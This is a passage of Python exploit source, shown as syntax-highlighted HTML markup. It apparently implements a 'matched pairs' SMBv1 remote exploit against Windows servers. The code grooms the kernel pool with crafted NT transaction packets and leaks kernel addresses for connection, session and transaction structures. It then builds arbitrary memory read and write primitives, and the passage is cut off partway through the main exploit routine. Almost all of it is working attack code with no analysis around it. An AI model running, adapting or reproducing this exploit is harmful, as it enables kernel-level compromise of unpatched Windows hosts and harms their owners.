    <span class="n">conn</span><span class="p">.</span><span class="n">send_raw</span><span class="p">(</span><span class="n">req1</span><span class="p">[:</span><span class="o">-</span><span class="mi">8</span><span class="p">])</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">send_raw</span><span class="p">(</span><span class="n">req1</span><span class="p">[</span><span class="o">-</span><span class="mi">8</span><span class="p">:]</span> <span class="o">+</span> <span class="n">req2</span><span class="p">)</span>
    <span class="n">leakData</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">recv_transaction_data</span><span class="p">(</span><span class="n">mid</span><span class="p">,</span> <span class="mi">4580</span><span class="p">)</span>
    <span class="n">leakData</span> <span class="o">=</span> <span class="n">leakData</span><span class="p">[</span><span class="mi">4308</span><span class="p">:]</span>
    <span class="k">if</span> <span class="n">leakData</span><span class="p">[</span><span class="n">X86_INFO</span><span class="p">[</span><span class="s">'FRAG_TAG_OFFSET'</span><span class="p">]:</span><span class="n">X86_INFO</span><span class="p">[</span><span class="s">'FRAG_TAG_OFFSET'</span><span class="p">]</span> <span class="o">+</span> <span class="mi">4</span><span class="p">]</span> <span class="o">==</span> <span class="s">'Frag'</span><span class="p">:</span>
        <span class="k">print</span> <span class="s">'Target is 32 bit'</span>
        <span class="n">info</span><span class="p">[</span><span class="s">'arch'</span><span class="p">]</span> <span class="o">=</span> <span class="s">'x86'</span>
        <span class="n">info</span><span class="p">[</span><span class="s">'FRAG_POOL_SIZE'</span><span class="p">]</span> <span class="o">=</span> <span class="nb">ord</span><span class="p">(</span><span class="n">leakData</span><span class="p">[</span><span class="n">X86_INFO</span><span class="p">[</span><span class="s">'FRAG_TAG_OFFSET'</span><span class="p">]</span> <span class="o">-</span> <span class="mi">2</span><span class="p">])</span> <span class="o">*</span> <span class="n">X86_INFO</span><span class="p">[</span><span class="s">'POOL_ALIGN'</span><span class="p">]</span>
    <span class="k">elif</span> <span class="n">leakData</span><span class="p">[</span><span class="n">X64_INFO</span><span class="p">[</span><span class="s">'FRAG_TAG_OFFSET'</span><span class="p">]:</span><span class="n">X64_INFO</span><span class="p">[</span><span class="s">'FRAG_TAG_OFFSET'</span><span class="p">]</span> <span class="o">+</span> <span class="mi">4</span><span class="p">]</span> <span class="o">==</span> <span class="s">'Frag'</span><span class="p">:</span>
        <span class="k">print</span> <span class="s">'Target is 64 bit'</span>
        <span class="n">info</span><span class="p">[</span><span class="s">'arch'</span><span class="p">]</span> <span class="o">=</span> <span class="s">'x64'</span>
        <span class="n">info</span><span class="p">[</span><span class="s">'FRAG_POOL_SIZE'</span><span class="p">]</span> <span class="o">=</span> <span class="nb">ord</span><span class="p">(</span><span class="n">leakData</span><span class="p">[</span><span class="n">X64_INFO</span><span class="p">[</span><span class="s">'FRAG_TAG_OFFSET'</span><span class="p">]</span> <span class="o">-</span> <span class="mi">2</span><span class="p">])</span> <span class="o">*</span> <span class="n">X64_INFO</span><span class="p">[</span><span class="s">'POOL_ALIGN'</span><span class="p">]</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="k">print</span> <span class="s">'Not found Frag pool tag in leak data'</span>
    <span class="k">print</span> <span class="p">(</span><span class="s">'Got frag size: 0x{:x}'</span><span class="p">).</span><span class="nb">format</span><span class="p">(</span><span class="n">info</span><span class="p">[</span><span class="s">'FRAG_POOL_SIZE'</span><span class="p">])</span>
    <span class="k">return</span> <span class="n">info</span>


<span class="k">def</span> <span class="nf">read_data</span><span class="p">(</span><span class="n">conn</span><span class="p">,</span> <span class="n">info</span><span class="p">,</span> <span class="n">read_addr</span><span class="p">,</span> <span class="n">read_size</span><span class="p">):</span>
    <span class="n">fmt</span> <span class="o">=</span> <span class="n">info</span><span class="p">[</span><span class="s">'PTR_FMT'</span><span class="p">]</span>
    <span class="n">new_data</span> <span class="o">=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;'</span> <span class="o">+</span> <span class="n">fmt</span> <span class="o">*</span> <span class="mi">3</span><span class="p">,</span> <span class="n">info</span><span class="p">[</span><span class="s">'trans2_addr'</span><span class="p">]</span> <span class="o">+</span> <span class="n">info</span><span class="p">[</span><span class="s">'TRANS_FLINK_OFFSET'</span><span class="p">],</span> <span class="n">info</span><span class="p">[</span><span class="s">'trans2_addr'</span><span class="p">]</span> <span class="o">+</span> <span class="mi">512</span><span class="p">,</span> <span class="n">read_addr</span><span class="p">)</span>
    <span class="n">new_data</span> <span class="o">+=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;II'</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span>
    <span class="n">new_data</span> <span class="o">+=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;III'</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">8</span><span class="p">)</span>
    <span class="n">new_data</span> <span class="o">+=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;III'</span><span class="p">,</span> <span class="n">read_size</span><span class="p">,</span> <span class="n">read_size</span><span class="p">,</span> <span class="n">read_size</span><span class="p">)</span>
    <span class="n">new_data</span> <span class="o">+=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;HH'</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">5</span><span class="p">)</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">send_nt_trans_secondary</span><span class="p">(</span><span class="n">mid</span><span class="o">=</span><span class="n">info</span><span class="p">[</span><span class="s">'trans1_mid'</span><span class="p">],</span> <span class="n">data</span><span class="o">=</span><span class="n">new_data</span><span class="p">,</span> <span class="n">dataDisplacement</span><span class="o">=</span><span class="n">info</span><span class="p">[</span><span class="s">'TRANS_OUTPARAM_OFFSET'</span><span class="p">])</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">send_nt_trans</span><span class="p">(</span><span class="mi">5</span><span class="p">,</span> <span class="n">param</span><span class="o">=</span><span class="n">pack</span><span class="p">(</span><span class="s">'&lt;HH'</span><span class="p">,</span> <span class="n">info</span><span class="p">[</span><span class="s">'fid'</span><span class="p">],</span> <span class="mi">0</span><span class="p">),</span> <span class="n">totalDataCount</span><span class="o">=</span><span class="mi">17120</span><span class="p">,</span> <span class="n">totalParameterCount</span><span class="o">=</span><span class="mi">4096</span><span class="p">)</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">send_nt_trans_secondary</span><span class="p">(</span><span class="n">mid</span><span class="o">=</span><span class="n">info</span><span class="p">[</span><span class="s">'trans2_mid'</span><span class="p">])</span>
    <span class="n">read_data</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">recv_transaction_data</span><span class="p">(</span><span class="n">info</span><span class="p">[</span><span class="s">'trans2_mid'</span><span class="p">],</span> <span class="mi">8</span> <span class="o">+</span> <span class="n">read_size</span><span class="p">)</span>
    <span class="n">info</span><span class="p">[</span><span class="s">'trans2_addr'</span><span class="p">]</span> <span class="o">=</span> <span class="n">unpack_from</span><span class="p">(</span><span class="s">'&lt;'</span> <span class="o">+</span> <span class="n">fmt</span><span class="p">,</span> <span class="n">read_data</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span> <span class="o">-</span> <span class="n">info</span><span class="p">[</span><span class="s">'TRANS_FLINK_OFFSET'</span><span class="p">]</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">send_nt_trans_secondary</span><span class="p">(</span><span class="n">mid</span><span class="o">=</span><span class="n">info</span><span class="p">[</span><span class="s">'trans1_mid'</span><span class="p">],</span> <span class="n">param</span><span class="o">=</span><span class="n">pack</span><span class="p">(</span><span class="s">'&lt;'</span> <span class="o">+</span> <span class="n">fmt</span><span class="p">,</span> <span class="n">info</span><span class="p">[</span><span class="s">'trans2_addr'</span><span class="p">]),</span> <span class="n">paramDisplacement</span><span class="o">=</span><span class="n">info</span><span class="p">[</span><span class="s">'TRANS_INDATA_OFFSET'</span><span class="p">])</span>
    <span class="n">wait_for_request_processed</span><span class="p">(</span><span class="n">conn</span><span class="p">)</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">send_nt_trans_secondary</span><span class="p">(</span><span class="n">mid</span><span class="o">=</span><span class="n">info</span><span class="p">[</span><span class="s">'trans1_mid'</span><span class="p">],</span> <span class="n">data</span><span class="o">=</span><span class="n">pack</span><span class="p">(</span><span class="s">'&lt;H'</span><span class="p">,</span> <span class="n">info</span><span class="p">[</span><span class="s">'trans2_mid'</span><span class="p">]),</span> <span class="n">dataDisplacement</span><span class="o">=</span><span class="n">info</span><span class="p">[</span><span class="s">'TRANS_MID_OFFSET'</span><span class="p">])</span>
    <span class="n">wait_for_request_processed</span><span class="p">(</span><span class="n">conn</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">read_data</span><span class="p">[</span><span class="mi">8</span><span class="p">:]</span>


<span class="k">def</span> <span class="nf">write_data</span><span class="p">(</span><span class="n">conn</span><span class="p">,</span> <span class="n">info</span><span class="p">,</span> <span class="n">write_addr</span><span class="p">,</span> <span class="n">write_data</span><span class="p">):</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">send_nt_trans_secondary</span><span class="p">(</span><span class="n">mid</span><span class="o">=</span><span class="n">info</span><span class="p">[</span><span class="s">'trans1_mid'</span><span class="p">],</span> <span class="n">data</span><span class="o">=</span><span class="n">pack</span><span class="p">(</span><span class="s">'&lt;'</span> <span class="o">+</span> <span class="n">info</span><span class="p">[</span><span class="s">'PTR_FMT'</span><span class="p">],</span> <span class="n">write_addr</span><span class="p">),</span> <span class="n">dataDisplacement</span><span class="o">=</span><span class="n">info</span><span class="p">[</span><span class="s">'TRANS_INDATA_OFFSET'</span><span class="p">])</span>
    <span class="n">wait_for_request_processed</span><span class="p">(</span><span class="n">conn</span><span class="p">)</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">send_nt_trans_secondary</span><span class="p">(</span><span class="n">mid</span><span class="o">=</span><span class="n">info</span><span class="p">[</span><span class="s">'trans2_mid'</span><span class="p">],</span> <span class="n">data</span><span class="o">=</span><span class="n">write_data</span><span class="p">)</span>
    <span class="n">wait_for_request_processed</span><span class="p">(</span><span class="n">conn</span><span class="p">)</span>


<span class="k">def</span> <span class="nf">align_transaction_and_leak</span><span class="p">(</span><span class="n">conn</span><span class="p">,</span> <span class="n">tid</span><span class="p">,</span> <span class="n">fid</span><span class="p">,</span> <span class="n">info</span><span class="p">,</span> <span class="n">numFill</span><span class="o">=</span><span class="mi">4</span><span class="p">):</span>
    <span class="n">trans_param</span> <span class="o">=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;HH'</span><span class="p">,</span> <span class="n">fid</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">numFill</span><span class="p">):</span>
        <span class="n">conn</span><span class="p">.</span><span class="n">send_nt_trans</span><span class="p">(</span><span class="mi">5</span><span class="p">,</span> <span class="n">param</span><span class="o">=</span><span class="n">trans_param</span><span class="p">,</span> <span class="n">totalDataCount</span><span class="o">=</span><span class="mi">4304</span><span class="p">,</span> <span class="n">maxParameterCount</span><span class="o">=</span><span class="n">GROOM_TRANS_SIZE</span> <span class="o">-</span> <span class="mi">4304</span><span class="p">)</span>

    <span class="n">mid_ntrename</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">next_mid</span><span class="p">()</span>
    <span class="n">req1</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">create_nt_trans_packet</span><span class="p">(</span><span class="mi">5</span><span class="p">,</span> <span class="n">param</span><span class="o">=</span><span class="n">trans_param</span><span class="p">,</span> <span class="n">mid</span><span class="o">=</span><span class="n">mid_ntrename</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="s">'A'</span> <span class="o">*</span> <span class="mi">4304</span><span class="p">,</span> <span class="n">maxParameterCount</span><span class="o">=</span><span class="n">info</span><span class="p">[</span><span class="s">'GROOM_DATA_SIZE'</span><span class="p">]</span> <span class="o">-</span> <span class="mi">4304</span><span class="p">)</span>
    <span class="n">req2</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">create_nt_trans_secondary_packet</span><span class="p">(</span><span class="n">mid_ntrename</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="s">'B'</span> <span class="o">*</span> <span class="mi">276</span><span class="p">)</span>
    <span class="n">req3</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">create_nt_trans_packet</span><span class="p">(</span><span class="mi">5</span><span class="p">,</span> <span class="n">param</span><span class="o">=</span><span class="n">trans_param</span><span class="p">,</span> <span class="n">mid</span><span class="o">=</span><span class="n">fid</span><span class="p">,</span> <span class="n">totalDataCount</span><span class="o">=</span><span class="n">info</span><span class="p">[</span><span class="s">'GROOM_DATA_SIZE'</span><span class="p">]</span> <span class="o">-</span> <span class="mi">4096</span><span class="p">,</span> <span class="n">maxParameterCount</span><span class="o">=</span><span class="mi">4096</span><span class="p">)</span>
    <span class="n">reqs</span> <span class="o">=</span> <span class="p">[]</span>
    <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">12</span><span class="p">):</span>
        <span class="n">mid</span> <span class="o">=</span> <span class="n">next_extra_mid</span><span class="p">()</span>
        <span class="n">reqs</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">conn</span><span class="p">.</span><span class="n">create_trans_packet</span><span class="p">(</span><span class="s">''</span><span class="p">,</span> <span class="n">mid</span><span class="o">=</span><span class="n">mid</span><span class="p">,</span> <span class="n">param</span><span class="o">=</span><span class="n">trans_param</span><span class="p">,</span> <span class="n">totalDataCount</span><span class="o">=</span><span class="n">info</span><span class="p">[</span><span class="s">'BRIDE_DATA_SIZE'</span><span class="p">]</span> <span class="o">-</span> <span class="mi">512</span><span class="p">,</span> <span class="n">totalParameterCount</span><span class="o">=</span><span class="mi">512</span><span class="p">,</span> <span class="n">maxDataCount</span><span class="o">=</span><span class="mi">0</span><span class="p">,</span> <span class="n">maxParameterCount</span><span class="o">=</span><span class="mi">0</span><span class="p">))</span>

    <span class="n">conn</span><span class="p">.</span><span class="n">send_raw</span><span class="p">(</span><span class="n">req1</span><span class="p">[:</span><span class="o">-</span><span class="mi">8</span><span class="p">])</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">send_raw</span><span class="p">(</span><span class="n">req1</span><span class="p">[</span><span class="o">-</span><span class="mi">8</span><span class="p">:]</span> <span class="o">+</span> <span class="n">req2</span> <span class="o">+</span> <span class="n">req3</span> <span class="o">+</span> <span class="p">(</span><span class="s">''</span><span class="p">).</span><span class="n">join</span><span class="p">(</span><span class="n">reqs</span><span class="p">))</span>
    <span class="n">leakData</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">recv_transaction_data</span><span class="p">(</span><span class="n">mid_ntrename</span><span class="p">,</span> <span class="mi">4580</span><span class="p">)</span>
    <span class="n">leakData</span> <span class="o">=</span> <span class="n">leakData</span><span class="p">[</span><span class="mi">4308</span><span class="p">:]</span>
    <span class="k">if</span> <span class="n">leakData</span><span class="p">[</span><span class="n">info</span><span class="p">[</span><span class="s">'FRAG_TAG_OFFSET'</span><span class="p">]:</span><span class="n">info</span><span class="p">[</span><span class="s">'FRAG_TAG_OFFSET'</span><span class="p">]</span> <span class="o">+</span> <span class="mi">4</span><span class="p">]</span> <span class="o">!=</span> <span class="s">'Frag'</span><span class="p">:</span>
        <span class="k">print</span> <span class="s">'Not found Frag pool tag in leak data'</span>
        <span class="k">return</span> <span class="bp">None</span>
    <span class="n">leakData</span> <span class="o">=</span> <span class="n">leakData</span><span class="p">[</span><span class="n">info</span><span class="p">[</span><span class="s">'FRAG_TAG_OFFSET'</span><span class="p">]</span> <span class="o">-</span> <span class="mi">4</span> <span class="o">+</span> <span class="n">info</span><span class="p">[</span><span class="s">'FRAG_POOL_SIZE'</span><span class="p">]:]</span>
    <span class="n">expected_size</span> <span class="o">=</span> <span class="n">pack</span><span class="p">(</span><span class="s">'&lt;H'</span><span class="p">,</span> <span class="n">info</span><span class="p">[</span><span class="s">'BRIDE_TRANS_SIZE'</span><span class="p">])</span>
    <span class="n">leakTransOffset</span> <span class="o">=</span> <span class="n">info</span><span class="p">[</span><span class="s">'POOL_ALIGN'</span><span class="p">]</span> <span class="o">+</span> <span class="n">info</span><span class="p">[</span><span class="s">'SRV_BUFHDR_SIZE'</span><span class="p">]</span>
    <span class="k">if</span> <span class="n">leakData</span><span class="p">[</span><span class="mi">4</span><span class="p">:</span><span class="mi">8</span><span class="p">]</span> <span class="o">!=</span> <span class="s">'LStr'</span> <span class="ow">or</span> <span class="n">leakData</span><span class="p">[</span><span class="n">info</span><span class="p">[</span><span class="s">'POOL_ALIGN'</span><span class="p">]:</span><span class="n">info</span><span class="p">[</span><span class="s">'POOL_ALIGN'</span><span class="p">]</span> <span class="o">+</span> <span class="mi">2</span><span class="p">]</span> <span class="o">!=</span> <span class="n">expected_size</span> <span class="ow">or</span> <span class="n">leakData</span><span class="p">[</span><span class="n">leakTransOffset</span> <span class="o">+</span> <span class="mi">2</span><span class="p">:</span><span class="n">leakTransOffset</span> <span class="o">+</span> <span class="mi">4</span><span class="p">]</span> <span class="o">!=</span> <span class="n">expected_size</span><span class="p">:</span>
        <span class="k">print</span> <span class="s">'No transaction struct in leak data'</span>
        <span class="k">return</span> <span class="bp">None</span>
    <span class="n">leakTrans</span> <span class="o">=</span> <span class="n">leakData</span><span class="p">[</span><span class="n">leakTransOffset</span><span class="p">:]</span>
    <span class="n">ptrf</span> <span class="o">=</span> <span class="n">info</span><span class="p">[</span><span class="s">'PTR_FMT'</span><span class="p">]</span>
    <span class="n">_</span><span class="p">,</span> <span class="n">connection_addr</span><span class="p">,</span> <span class="n">session_addr</span><span class="p">,</span> <span class="n">treeconnect_addr</span><span class="p">,</span> <span class="n">flink_value</span> <span class="o">=</span> <span class="n">unpack_from</span><span class="p">(</span><span class="s">'&lt;'</span> <span class="o">+</span> <span class="n">ptrf</span> <span class="o">*</span> <span class="mi">5</span><span class="p">,</span> <span class="n">leakTrans</span><span class="p">,</span> <span class="mi">8</span><span class="p">)</span>
    <span class="n">inparam_value</span> <span class="o">=</span> <span class="n">unpack_from</span><span class="p">(</span><span class="s">'&lt;'</span> <span class="o">+</span> <span class="n">ptrf</span><span class="p">,</span> <span class="n">leakTrans</span><span class="p">,</span> <span class="n">info</span><span class="p">[</span><span class="s">'TRANS_INPARAM_OFFSET'</span><span class="p">])[</span><span class="mi">0</span><span class="p">]</span>
    <span class="n">leak_mid</span> <span class="o">=</span> <span class="n">unpack_from</span><span class="p">(</span><span class="s">'&lt;H'</span><span class="p">,</span> <span class="n">leakTrans</span><span class="p">,</span> <span class="n">info</span><span class="p">[</span><span class="s">'TRANS_MID_OFFSET'</span><span class="p">])[</span><span class="mi">0</span><span class="p">]</span>
    <span class="k">print</span> <span class="p">(</span><span class="s">'CONNECTION: 0x{:x}'</span><span class="p">).</span><span class="nb">format</span><span class="p">(</span><span class="n">connection_addr</span><span class="p">)</span>
    <span class="k">print</span> <span class="p">(</span><span class="s">'SESSION: 0x{:x}'</span><span class="p">).</span><span class="nb">format</span><span class="p">(</span><span class="n">session_addr</span><span class="p">)</span>
    <span class="k">print</span> <span class="p">(</span><span class="s">'FLINK: 0x{:x}'</span><span class="p">).</span><span class="nb">format</span><span class="p">(</span><span class="n">flink_value</span><span class="p">)</span>
    <span class="k">print</span> <span class="p">(</span><span class="s">'InParam: 0x{:x}'</span><span class="p">).</span><span class="nb">format</span><span class="p">(</span><span class="n">inparam_value</span><span class="p">)</span>
    <span class="k">print</span> <span class="p">(</span><span class="s">'MID: 0x{:x}'</span><span class="p">).</span><span class="nb">format</span><span class="p">(</span><span class="n">leak_mid</span><span class="p">)</span>
    <span class="n">next_page_addr</span> <span class="o">=</span> <span class="p">(</span><span class="n">inparam_value</span> <span class="o">&amp;</span> <span class="il">18446744073709547520L</span><span class="p">)</span> <span class="o">+</span> <span class="mi">4096</span>
    <span class="k">if</span> <span class="n">next_page_addr</span> <span class="o">+</span> <span class="n">info</span><span class="p">[</span><span class="s">'GROOM_POOL_SIZE'</span><span class="p">]</span> <span class="o">+</span> <span class="n">info</span><span class="p">[</span><span class="s">'FRAG_POOL_SIZE'</span><span class="p">]</span> <span class="o">+</span> <span class="n">info</span><span class="p">[</span><span class="s">'POOL_ALIGN'</span><span class="p">]</span> <span class="o">+</span> <span class="n">info</span><span class="p">[</span><span class="s">'SRV_BUFHDR_SIZE'</span><span class="p">]</span> <span class="o">+</span> <span class="n">info</span><span class="p">[</span><span class="s">'TRANS_FLINK_OFFSET'</span><span class="p">]</span> <span class="o">!=</span> <span class="n">flink_value</span><span class="p">:</span>
        <span class="k">print</span> <span class="p">(</span><span class="s">'unexpected alignment, diff: 0x{:x}'</span><span class="p">).</span><span class="nb">format</span><span class="p">(</span><span class="n">flink_value</span> <span class="o">-</span> <span class="n">next_page_addr</span><span class="p">)</span>
        <span class="k">return</span> <span class="bp">None</span>
    <span class="k">return</span> <span class="p">{</span><span class="s">'connection'</span><span class="p">:</span> <span class="n">connection_addr</span><span class="p">,</span> <span class="s">'session'</span><span class="p">:</span> <span class="n">session_addr</span><span class="p">,</span> <span class="s">'next_page_addr'</span><span class="p">:</span> <span class="n">next_page_addr</span><span class="p">,</span> <span class="s">'trans1_mid'</span><span class="p">:</span> <span class="n">leak_mid</span><span class="p">,</span> <span class="s">'trans1_addr'</span><span class="p">:</span> <span class="p">(</span><span class="n">inparam_value</span> <span class="o">-</span> <span class="n">info</span><span class="p">[</span><span class="s">'TRANS_SIZE'</span><span class="p">]</span> <span class="o">-</span> <span class="n">TRANS_NAME_LEN</span><span class="p">),</span> <span class="s">'trans2_addr'</span><span class="p">:</span> <span class="p">(</span><span class="n">flink_value</span> <span class="o">-</span> <span class="n">info</span><span class="p">[</span><span class="s">'TRANS_FLINK_OFFSET'</span><span class="p">])}</span>


<span class="k">def</span> <span class="nf">exploit_matched_pairs</span><span class="p">(</span><span class="n">conn</span><span class="p">,</span> <span class="n">pipe_name</span><span class="p">,</span> <span class="n">info</span><span class="p">):</span>
    <span class="n">tid</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">tree_connect_andx</span><span class="p">(</span><span class="s">'</span><span class="se">\\\\</span><span class="s">'</span> <span class="o">+</span> <span class="n">conn</span><span class="p">.</span><span class="n">get_remote_host</span><span class="p">()</span> <span class="o">+</span> <span class="s">'</span><span class="se">\\</span><span class="s">'</span> <span class="o">+</span> <span class="s">'IPC$'</span><span class="p">)</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">set_default_tid</span><span class="p">(</span><span class="n">tid</span><span class="p">)</span>
    <span class="n">fid</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">nt_create_andx</span><span class="p">(</span><span class="n">tid</span><span class="p">,</span> <span class="n">pipe_name</span><span class="p">)</span>
    <span class="n">info</span><span class="p">.</span><span class="n">update</span><span class="p">(</span><span class="n">leak_frag_size</span><span class="p">(</span><span class="n">conn</span><span class="p">,</span> <span class="n">tid</span><span class="p">,</span> <span class="n">fid</span><span class="p">))</span>
    <span class="n">info</span><span class="p">.</span><span class="n">update</span><span class="p">(</span><span class="n">OS_ARCH_INFO</span><span class="p">[</span><span class="n">info</span><span class="p">[</span><span class="s">'os'</span><span class="p">]][</span><span class="n">info</span><span class="p">[</span><span class="s">'arch'</span><span class="p">]])</span>
    <span class="n">info</span><span class="p">[</span><span class="s">'GROOM_POOL_SIZE'</span><span class="p">]</span> <span class="o">=</span> <span class="n">calc_alloc_size</span><span class="p">(</span><span class="n">GROOM_TRANS_SIZE</span> <span class="o">+</span> <span class="n">info</span><span class="p">[</span><span class="s">'SRV_BUFHDR_SIZE'</span><span class="p">]</span> <span class="o">+</span> <span class="n">info</span><span class="p">[</span><span class="s">'POOL_ALIGN'</span><span class="p">],</span> <span class="n">info</span><span class="p">[</span><span class="s">'POOL_ALIGN'</span><span class="p">])</span>
    <span class="k">print</span> <span class="p">(</span><span class="s">'GROOM_POOL_SIZE: 0x{:x}'</span><span class="p">).</span><span class="nb">format</span><span class="p">(</span><span class="n">info</span><span class="p">[</span><span class="s">'GROOM_POOL_SIZE'</span><span class="p">])</span>
    <span class="n">info</span><span class="p">[</span><span class="s">'GROOM_DATA_SIZE'</span><span class="p">]</span> <span class="o">=</span> <span class="n">GROOM_TRANS_SIZE</span> <span class="o">-</span> <span class="n">TRANS_NAME_LEN</span> <span class="o">-</span> <span class="mi">4</span> <span class="o">-</span> <span class="n">info</span><span class="p">[</span><span class="s">'TRANS_SIZE'</span><span class="p">]</span>
    <span class="n">bridePoolSize</span> <span class="o">=</span> <span class="mi">4096</span> <span class="o">-</span> <span class="p">(</span><span class="n">info</span><span class="p">[</span><span class="s">'GROOM_POOL_SIZE'</span><span class="p">]</span> <span class="o">&amp;</span> <span class="mi">4095</span><span class="p">)</span> <span class="o">-</span> <span class="n">info</span><span class="p">[</span><span class="s">'FRAG_POOL_SIZE'</span><span class="p">]</span>
    <span class="n">info</span><span class="p">[</span><span class="s">'BRIDE_TRANS_SIZE'</span><span class="p">]</span> <span class="o">=</span> <span class="n">bridePoolSize</span> <span class="o">-</span> <span class="p">(</span><span class="n">info</span><span class="p">[</span><span class="s">'SRV_BUFHDR_SIZE'</span><span class="p">]</span> <span class="o">+</span> <span class="n">info</span><span class="p">[</span><span class="s">'POOL_ALIGN'</span><span class="p">])</span>
    <span class="k">print</span> <span class="p">(</span><span class="s">'BRIDE_TRANS_SIZE: 0x{:x}'</span><span class="p">).</span><span class="nb">format</span><span class="p">(</span><span class="n">info</span><span class="p">[</span><span class="s">'BRIDE_TRANS_SIZE'</span><span class="p">])</span>
    <span class="n">info</span><span class="p">[</span><span class="s">'BRIDE_DATA_SIZE'</span><span class="p">]</span> <span class="o">=</span> <span class="n">info</span><span class="p">[</span><span class="s">'BRIDE_TRANS_SIZE'</span><span class="p">]</span> <span class="o">-</span> <span class="n">TRANS_NAME_LEN</span> <span class="o">-</span> <span class="n">info</span><span class="p">[</span><span class="s">'TRANS_SIZE'</span><span class="p">]</span>
    <span class="n">leakInfo</span> <span class="o">=</span> <span class="bp">None</span>
    <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">10</span><span class="p">):</span>
        <span class="n">reset_extra_mid</span><span class="p">(</span><span class="n">conn</span><span class="p">)</span>
        <span class="n">leakInfo</span> <span class="o">=</span> <span class="n">align_transaction_and_leak</span><span class="p">(</span><span class="n">conn</span><span class="p">,</span> <span class="n">tid</span><span class="p">,</span> <span class="n">fid</span><span class="p">,</span> <span class="n">info</span><span class="p">)</span>
        <span class="k">if</span> <span class="n">leakInfo</span> <span class="ow">is</span> <span class="ow">not</span> <span class="bp">None</span><span class="p">:</span>
            <span class="k">break</span>
        <span class="k">print</span> <span class="s">'leak failed... try again'</span>
        <span class="n">conn</span><span class="p">.</span><span class="n">close</span><span class="p">(</span><span class="n">tid</span><span class="p">,</span> <span class="n">fid</span><span class="p">)</span>
        <span class="n">conn</span><span class="p">.</span><span class="n">disconnect_tree</span><span class="p">(</span><span class="n">tid</span><span class="p">)</span>
        <span class="n">tid</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">tree_connect_andx</span><span class="p">(</span><span class="s">'</span><span class="se">\\\\</span><span class="s">'</span> <span class="o">+</span> <span class="n">conn</span><span class="p">.</span><span class="n">get_remote_host</span><span class="p">()</span> <span class="o">+</span> <span class="s">'</span><span class="se">\\</span><span class="s">'</span> <span class="o">+</span> <span class="s">'IPC$'</span><span class="p">)</span>
        <span class="n">conn</span><span class="p">.</span><span class="n">set_default_tid</span><span class="p">(</span><span class="n">tid</span><span class="p">)</span>
        <span class="n">fid</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">nt_create_andx</span><span class="p">(</span><span class="n">tid</span><span class="p">,</span> <span class="n">pipe_name</span><span class="p">)</span>

    <span class="k">if</span> <span class="n">leakInfo</span> <span class="ow">is</span> <span class="bp">None</span><span class="p">:</span>
        <span class="k">return</span> <span class="bp">False</span>
    <span class="n">info</span><span class="p">[</span><span class="s">'fid'</span><span class="p">]</span> <span class="o">=</span> <span class="n">fid</span>
    <span class="n">info</span><span class="p">.</span><span class="n">update</span><span class="p">(</span><span class="n">leakInfo</span><span class="p">)</span>
    <span class="n">shift_indata_byte</span> <span class="o">=</span> <span class="mi">512</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">do_write_andx_raw_pipe</span><span class="p">(</span><span class="n">fid</span><span class="p">,</span> <span class="s">'A'</span> <span class="o">*</span> <span class="n">shift_indata_byte</span><span class="p">)</span>
    <span class="n">indata_value</span> <span class="o">=</span> <span class="n">info</span><span class="p">[</span><span class="s">'next_page_addr'</span><span class="p">]</span> <span class="o">+</span> <span class="n">info</span><span class="p">[</span><span class="s">'TRANS_SIZE'</span><span class="p">]</span> <span class="o">+</span> <span class="mi">8</span> <span class="o">+</span> <span class="n">info</span><span class="p">[</span><span class="s">'SRV_BUFHDR_SIZE'</span><span class="p">]</span> <span class="o">+</span> <span class="mi">4096</span> <span class="o">+</span> <span class="n">shift_indata_byte</span>
    <span class="n">indata_next_trans_displacement</span> <span class="o">=</span> <span class="n">info</span><span class="p">[</span><span class="s">'trans2_addr'</span><span class="p">]</span> <span class="o">-</span> <span class="n">indata_value</span>
